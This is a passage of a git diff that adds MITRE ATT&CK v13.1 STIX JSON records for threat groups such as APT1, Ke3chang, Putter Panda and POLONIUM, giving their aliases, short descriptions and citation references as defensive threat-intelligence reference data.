"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--5cbe0d3b-6fb1-471f-b591-4b192915116d.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--5cbe0d3b-6fb1-471f-b591-4b192915116d.json new file mode 100644 index 0000000000000000000000000000000000000000..95c4e9078ae30c0a29a828ecc04a5a55e81c9741 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--5cbe0d3b-6fb1-471f-b591-4b192915116d.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--44f5a127-a98b-4e60-8060-dd0663f83487", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Suckfly" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "intrusion-set", + "id": "intrusion-set--5cbe0d3b-6fb1-471f-b591-4b192915116d", + "created": "2017-05-31T21:32:06.777Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "G0039", + "url": "https://attack.mitre.org/groups/G0039" + }, + { + "source_name": "Suckfly", + "description": "(Citation: Symantec Suckfly March 2016) (Citation: Symantec Suckfly May 2016)" + }, + { + "source_name": "Symantec Suckfly March 2016", + "url": "http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates", + "description": "DiMaggio, J. (2016, March 15). Suckfly: Revealing the secret life of your code signing certificates. Retrieved August 3, 2016." + }, + { + "source_name": "Symantec Suckfly May 2016", + "url": "http://www.symantec.com/connect/blogs/indian-organizations-targeted-suckfly-attacks", + "description": "DiMaggio, J. (2016, May 17). Indian organizations targeted in Suckfly attacks. Retrieved August 3, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Suckfly](https://attack.mitre.org/groups/G0039) is a China-based threat group that has been active since at least 2014. (Citation: Symantec Suckfly March 2016)", + "modified": "2022-04-15T16:27:38.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Suckfly", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--5ce5392a-3a6c-4e07-9df3-9b6a9159ac45.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--5ce5392a-3a6c-4e07-9df3-9b6a9159ac45.json new file mode 100644 index 0000000000000000000000000000000000000000..abe043e00029d1349cc3b7a9d96df0bfeb234fc3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--5ce5392a-3a6c-4e07-9df3-9b6a9159ac45.json @@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--a1cf9487-3a44-456a-9874-1959085e63e2", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Putter Panda", + "APT2", + "MSUpdater" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--5ce5392a-3a6c-4e07-9df3-9b6a9159ac45", + "type": "intrusion-set", + "created": "2017-05-31T21:31:56.785Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0024", + "external_id": "G0024" + }, + { + "source_name": "Putter Panda", + "description": "(Citation: CrowdStrike Putter Panda) (Citation: Cylance Putter Panda)" + }, + { + "source_name": "APT2", + "description": "(Citation: Cylance Putter Panda)" + }, + { + "source_name": "MSUpdater", + "description": "(Citation: CrowdStrike Putter Panda)" + }, + { + "source_name": "CrowdStrike Putter Panda", + "description": "Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016.", + "url": "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf" + }, + { + "url": "http://blog.cylance.com/puttering-into-the-future", + "description": "Gross, J. and Walter, J.. (2016, January 12). Puttering into the Future.... Retrieved January 22, 2016.", + "source_name": "Cylance Putter Panda" + } + ], + "modified": "2020-03-30T19:15:04.771Z", + "name": "Putter Panda", + "description": "[Putter Panda](https://attack.mitre.org/groups/G0024) is a Chinese threat group that has been attributed to Unit 61486 of the 12th Bureau of the PLA\u2019s 3rd General Staff Department (GSD). (Citation: CrowdStrike Putter Panda)", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--5e78ae92-3ffd-4b16-bf62-e798529d73f1.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--5e78ae92-3ffd-4b16-bf62-e798529d73f1.json new file mode 100644 index 0000000000000000000000000000000000000000..5dcb0c8e7f8d8ccd5fbb138413816d4809b08163 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--5e78ae92-3ffd-4b16-bf62-e798529d73f1.json @@ -0,0 +1,42 @@ +{ + "type": "bundle", + "id": "bundle--1bb204d4-61e7-4156-86d4-d46d902449e6", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-26T22:11:36.315Z", + "name": "Sharpshooter", + "description": "Operation [Sharpshooter](https://attack.mitre.org/groups/G0104) is the name of a cyber espionage campaign discovered in October 2018 targeting nuclear, defense, energy, and financial companies. Though overlaps between this adversary and [Lazarus Group](https://attack.mitre.org/groups/G0032) have been noted, definitive links have not been established.(Citation: McAfee Sharpshooter December 2018)", + "aliases": [ + "Sharpshooter" + ], + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "type": "intrusion-set", + "id": "intrusion-set--5e78ae92-3ffd-4b16-bf62-e798529d73f1", + "created": "2020-05-14T21:40:31.089Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0104", + "external_id": "G0104" + }, + { + "source_name": "McAfee Sharpshooter December 2018", + "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020.", + "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--5f3d0238-d058-44a9-8812-3dd1b6741a8c.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--5f3d0238-d058-44a9-8812-3dd1b6741a8c.json new file mode 100644 index 0000000000000000000000000000000000000000..d584b91d54cfc060bd6c7857e6583f0a8b28d0d7 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--5f3d0238-d058-44a9-8812-3dd1b6741a8c.json @@ -0,0 +1,42 @@ +{ + "type": "bundle", + "id": "bundle--ed6e2eaa-e1f3-4071-b5c8-e1a13da56375", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "POLONIUM" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "intrusion-set", + "id": "intrusion-set--5f3d0238-d058-44a9-8812-3dd1b6741a8c", + "created": "2022-07-01T19:07:04.253Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "G1005", + "url": "https://attack.mitre.org/groups/G1005" + }, + { + "source_name": "Microsoft POLONIUM June 2022", + "url": "https://www.microsoft.com/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/", + "description": "Microsoft. (2022, June 2). Exposing POLONIUM activity and infrastructure targeting Israeli organizations. Retrieved July 1, 2022." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[POLONIUM](https://attack.mitre.org/groups/G1005) is a Lebanon-based group that has primarily targeted Israeli organizations, including critical manufacturing, information technology, and defense industry companies, since at least February 2022. Security researchers assess [POLONIUM](https://attack.mitre.org/groups/G1005) has coordinated their operations with multiple actors affiliated with Iran\u2019s Ministry of Intelligence and Security (MOIS), based on victim overlap as well as common techniques and tooling.(Citation: Microsoft POLONIUM June 2022)", + "modified": "2022-08-10T12:31:10.192Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "POLONIUM", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--62a64fd3-aaf7-4d09-a375-d6f8bb118481.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--62a64fd3-aaf7-4d09-a375-d6f8bb118481.json new file mode 100644 index 0000000000000000000000000000000000000000..a902a2e39d405273e849597a3aae5acd1fb64a01 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--62a64fd3-aaf7-4d09-a375-d6f8bb118481.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--a4302652-a411-480f-bfb5-ea3b123f3dc4", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "TA459" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Valerii Marchuk, Cybersecurity Help s.r.o." + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--62a64fd3-aaf7-4d09-a375-d6f8bb118481", + "type": "intrusion-set", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0062", + "external_id": "G0062" + }, + { + "source_name": "TA459", + "description": "(Citation: Proofpoint TA459 April 2017)" + }, + { + "url": "https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts", + "description": "Axel F. (2017, April 27). APT Targets Financial Analysts with CVE-2017-0199. Retrieved February 15, 2018.", + "source_name": "Proofpoint TA459 April 2017" + } + ], + "modified": "2020-03-30T19:22:32.962Z", + "name": "TA459", + "description": "[TA459](https://attack.mitre.org/groups/G0062) is a threat group believed to operate out of China that has targeted countries including Russia, Belarus, Mongolia, and others. (Citation: Proofpoint TA459 April 2017)", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--64b52e7d-b2c4-4a02-9372-08a463f5dc11.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--64b52e7d-b2c4-4a02-9372-08a463f5dc11.json new file mode 100644 index 0000000000000000000000000000000000000000..55fe70caef159f75f7860a041340cbf1cbf30403 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--64b52e7d-b2c4-4a02-9372-08a463f5dc11.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--e7a201de-43c0-4b11-a1a6-ae84ab3229d9", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-21T21:16:34.243Z", + "name": "Aquatic Panda", + "description": "[Aquatic Panda](https://attack.mitre.org/groups/G0143) is a suspected China-based threat group with a dual mission of intelligence collection and industrial espionage. Active since at least May 2020, [Aquatic Panda](https://attack.mitre.org/groups/G0143) has primarily targeted entities in the telecommunications, technology, and government sectors.(Citation: CrowdStrike AQUATIC PANDA December 2021)", + "aliases": [ + "Aquatic Panda" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "NST Assure Research Team, NetSentries Technologies", + "Pooja Natarajan, NEC Corporation India", + "Hiroki Nagahama, NEC Corporation", + "Manikantan Srinivasan, NEC Corporation India" + ], + "type": "intrusion-set", + "id": "intrusion-set--64b52e7d-b2c4-4a02-9372-08a463f5dc11", + "created": "2022-01-18T14:49:29.505Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0143", + "external_id": "G0143" + }, + { + "source_name": "CrowdStrike AQUATIC PANDA December 2021", + "description": "Wiley, B. et al. (2021, December 29). OverWatch Exposes AQUATIC PANDA in Possession of Log4Shell Exploit Tools During Hands-on Intrusion Attempt. Retrieved January 18, 2022.", + "url": "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--64d5f96a-f121-4d19-89f6-6709f5c49faa.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--64d5f96a-f121-4d19-89f6-6709f5c49faa.json new file mode 100644 index 0000000000000000000000000000000000000000..e2462872d85e04d1b01bc28da5c04234d9b778cc --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--64d5f96a-f121-4d19-89f6-6709f5c49faa.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--fd9bdbe5-cfec-46a9-9dd0-6bae726208a5", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T18:50:40.179Z", + "name": "Aoqin Dragon", + "description": "[Aoqin Dragon](https://attack.mitre.org/groups/G1007) is a suspected Chinese cyber espionage threat group that has been active since at least 2013. [Aoqin Dragon](https://attack.mitre.org/groups/G1007) has primarily targeted government, education, and telecommunication organizations in Australia, Cambodia, Hong Kong, Singapore, and Vietnam. Security researchers noted a potential association between [Aoqin Dragon](https://attack.mitre.org/groups/G1007) and UNC94, based on malware, infrastructure, and targets.(Citation: SentinelOne Aoqin Dragon June 2022)", + "aliases": [ + "Aoqin Dragon" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Hiroki Nagahama, NEC Corporation", + "Pooja Natarajan, NEC Corporation India", + "Manikantan Srinivasan, NEC Corporation India" + ], + "type": "intrusion-set", + "id": "intrusion-set--64d5f96a-f121-4d19-89f6-6709f5c49faa", + "created": "2022-07-14T14:32:47.582Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G1007", + "external_id": "G1007" + }, + { + "source_name": "SentinelOne Aoqin Dragon June 2022", + "description": "Chen, Joey. (2022, June 9). Aoqin Dragon | Newly-Discovered Chinese-linked APT Has Been Quietly Spying On Organizations For 10 Years. Retrieved July 14, 2022.", + "url": "https://www.sentinelone.com/labs/aoqin-dragon-newly-discovered-chinese-linked-apt-has-been-quietly-spying-on-organizations-for-10-years/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6566aac9-dad8-4332-ae73-20c23bad7f02.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6566aac9-dad8-4332-ae73-20c23bad7f02.json new file mode 100644 index 0000000000000000000000000000000000000000..89ba7ec1720eec727a21ca6c354a4db6759c69d1 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6566aac9-dad8-4332-ae73-20c23bad7f02.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--2c524cca-6eca-4572-a98f-febd782cf9a6", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Ferocious Kitten" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Pooja Natarajan, NEC Corporation India", + "Manikantan Srinivasan, NEC Corporation India", + "Hiroki Nagahama, NEC Corporation" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--6566aac9-dad8-4332-ae73-20c23bad7f02", + "type": "intrusion-set", + "created": "2021-09-28T17:41:12.950Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0137", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0137" + }, + { + "source_name": "Kaspersky Ferocious Kitten Jun 2021", + "url": "https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/", + "description": "GReAT. (2021, June 16). Ferocious Kitten: 6 Years of Covert Surveillance in Iran. Retrieved September 22, 2021." + } + ], + "modified": "2021-10-25T14:28:10.337Z", + "name": "Ferocious Kitten", + "description": "[Ferocious Kitten](https://attack.mitre.org/groups/G0137) is a threat group that has primarily targeted Persian-speaking individuals in Iran since at least 2015.(Citation: Kaspersky Ferocious Kitten Jun 2021)", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6688d679-ccdb-4f12-abf6-c7545dd767a4.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6688d679-ccdb-4f12-abf6-c7545dd767a4.json new file mode 100644 index 0000000000000000000000000000000000000000..be8cde5bdc1df29dbbdc797bcd090570c0713f5c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6688d679-ccdb-4f12-abf6-c7545dd767a4.json @@ -0,0 +1,39 @@ +{ + "type": "bundle", + "id": "bundle--cf0c73ee-d5af-4b5f-9a8d-edfa915a8b2e", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "The White Company" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--6688d679-ccdb-4f12-abf6-c7545dd767a4", + "type": "intrusion-set", + "created": "2019-05-02T00:08:18.314Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0089", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0089" + }, + { + "description": "Livelli, K, et al. (2018, November 12). Operation Shaheen. Retrieved May 1, 2019.", + "url": "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/WhiteCompanyOperationShaheenReport.pdf?_ga=2.161661948.1943296560.1555683782-1066572390.1555511517", + "source_name": "Cylance Shaheen Nov 2018" + } + ], + "modified": "2020-03-30T19:24:52.290Z", + "name": "The White Company", + "description": "[The White Company](https://attack.mitre.org/groups/G0089) is a likely state-sponsored threat actor with advanced capabilities. From 2017 through 2018, the group led an espionage campaign called Operation Shaheen targeting government and military organizations in Pakistan.(Citation: Cylance Shaheen Nov 2018)", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6713ab67-e25b-49cc-808d-2b36d4fbc35c.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6713ab67-e25b-49cc-808d-2b36d4fbc35c.json new file mode 100644 index 0000000000000000000000000000000000000000..850d87aa1a8f60f323d8fe6c3ef678f4d8f68a56 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6713ab67-e25b-49cc-808d-2b36d4fbc35c.json @@ -0,0 +1,106 @@ +{ + "type": "bundle", + "id": "bundle--f90fbb7f-e028-4d9a-943f-51d7cc4cfebc", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Ke3chang", + "APT15", + "Mirage", + "Vixen Panda", + "GREF", + "Playful Dragon", + "RoyalAPT", + "NICKEL" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Pooja Natarajan, NEC Corporation India", + "Manikantan Srinivasan, NEC Corporation India", + "Hiroki Nagahama, NEC Corporation" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "intrusion-set", + "id": "intrusion-set--6713ab67-e25b-49cc-808d-2b36d4fbc35c", + "created": "2017-05-31T21:31:47.177Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "G0004", + "url": "https://attack.mitre.org/groups/G0004" + }, + { + "source_name": "RoyalAPT", + "description": "(Citation: APT15 Intezer June 2018)" + }, + { + "source_name": "NICKEL", + "description": "(Citation: Microsoft NICKEL December 2021)" + }, + { + "source_name": "APT15", + "description": "(Citation: NCC Group APT15 Alive and Strong)" + }, + { + "source_name": "Mirage", + "description": "(Citation: NCC Group APT15 Alive and Strong)" + }, + { + "source_name": "GREF", + "description": "(Citation: NCC Group APT15 Alive and Strong)" + }, + { + "source_name": "Vixen Panda", + "description": "(Citation: NCC Group APT15 Alive and Strong)(Citation: APT15 Intezer June 2018)" + }, + { + "source_name": "Playful Dragon", + "description": "(Citation: NCC Group APT15 Alive and Strong)(Citation: APT15 Intezer June 2018)" + }, + { + "source_name": "Ke3chang", + "description": "(Citation: Villeneuve et al 2014) (Citation: NCC Group APT15 Alive and Strong) (Citation: APT15 Intezer June 2018)" + }, + { + "source_name": "Microsoft NICKEL December 2021", + "url": "https://www.microsoft.com/security/blog/2021/12/06/nickel-targeting-government-organizations-across-latin-america-and-europe", + "description": "MSTIC. (2021, December 6). NICKEL targeting government organizations across Latin America and Europe. Retrieved March 18, 2022." + }, + { + "source_name": "APT15 Intezer June 2018", + "url": "https://web.archive.org/web/20180615122133/https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/", + "description": "Rosenberg, J. (2018, June 14). MirageFox: APT15 Resurfaces With New Tools Based On Old Ones. Retrieved September 21, 2018." + }, + { + "source_name": "NCC Group APT15 Alive and Strong", + "url": "https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "description": "Smallridge, R. (2018, March 10). APT15 is alive and strong: An analysis of RoyalCli and RoyalDNS. Retrieved April 4, 2018." + }, + { + "source_name": "Mandiant Operation Ke3chang November 2014", + "url": "https://www.mandiant.com/resources/operation-ke3chang-targeted-attacks-against-ministries-of-foreign-affairs", + "description": "Villeneuve, N., Bennett, J. T., Moran, N., Haq, T., Scott, M., & Geers, K. (2014). OPERATION \u201cKE3CHANG\u201d: Targeted Attacks Against Ministries of Foreign Affairs. Retrieved November 12, 2014." + }, + { + "source_name": "Villeneuve et al 2014", + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", + "description": "Villeneuve, N., Bennett, J. T., Moran, N., Haq, T., Scott, M., & Geers, K. (2014). OPERATION \u201cKE3CHANG\u201d: Targeted Attacks Against Ministries of Foreign Affairs. Retrieved November 12, 2014." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Ke3chang](https://attack.mitre.org/groups/G0004) is a threat group attributed to actors operating out of China. [Ke3chang](https://attack.mitre.org/groups/G0004) has targeted oil, government, diplomatic, military, and NGOs in Central and South America, the Caribbean, Europe, and North America since at least 2010.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)(Citation: APT15 Intezer June 2018)(Citation: Microsoft NICKEL December 2021)", + "modified": "2022-07-22T18:52:32.762Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Ke3chang", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--68ba94ab-78b8-43e7-83e2-aed3466882c6.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--68ba94ab-78b8-43e7-83e2-aed3466882c6.json new file mode 100644 index 0000000000000000000000000000000000000000..674c156e166fbb64d269c807a733a817a4b88c21 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--68ba94ab-78b8-43e7-83e2-aed3466882c6.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--fbc3b716-49c9-426c-a9d1-cfab8a3e9098", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "id": "intrusion-set--68ba94ab-78b8-43e7-83e2-aed3466882c6", + "type": "intrusion-set", + "created": "2018-01-16T16:13:52.465Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0057", + "external_id": "G0057" + } + ], + "modified": "2018-10-17T00:17:13.469Z", + "name": "APT34", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662.json new file mode 100644 index 0000000000000000000000000000000000000000..1865a1290236bc38cc7655a9f85eace7a97cce04 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662.json @@ -0,0 +1,63 @@ +{ + "type": "bundle", + "id": "bundle--46625d69-5028-4751-a476-58a253acc72a", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "APT1", + "Comment Crew", + "Comment Group", + "Comment Panda" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662", + "type": "intrusion-set", + "created": "2017-05-31T21:31:47.955Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0006", + "external_id": "G0006" + }, + { + "source_name": "APT1", + "description": "(Citation: Mandiant APT1)" + }, + { + "source_name": "Comment Crew", + "description": "(Citation: Mandiant APT1)" + }, + { + "source_name": "Comment Group", + "description": "(Citation: Mandiant APT1)" + }, + { + "source_name": "Comment Panda", + "description": "(Citation: CrowdStrike Putter Panda)" + }, + { + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "source_name": "Mandiant APT1" + }, + { + "url": "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf", + "description": "Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016.", + "source_name": "CrowdStrike Putter Panda" + } + ], + "modified": "2021-05-26T12:23:48.842Z", + "name": "APT1", + "description": "[APT1](https://attack.mitre.org/groups/G0006) is a Chinese threat group that has been attributed to the 2nd Bureau of the People\u2019s Liberation Army (PLA) General Staff Department\u2019s (GSD) 3rd Department, commonly known by its Military Unit Cover Designator (MUCD) as Unit 61398. (Citation: Mandiant APT1)", + "x_mitre_version": "1.4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e.json new file mode 100644 index 0000000000000000000000000000000000000000..2305eeec373ed200e610c5d33a8e13b4ee3e5807 --- /dev/null +++ 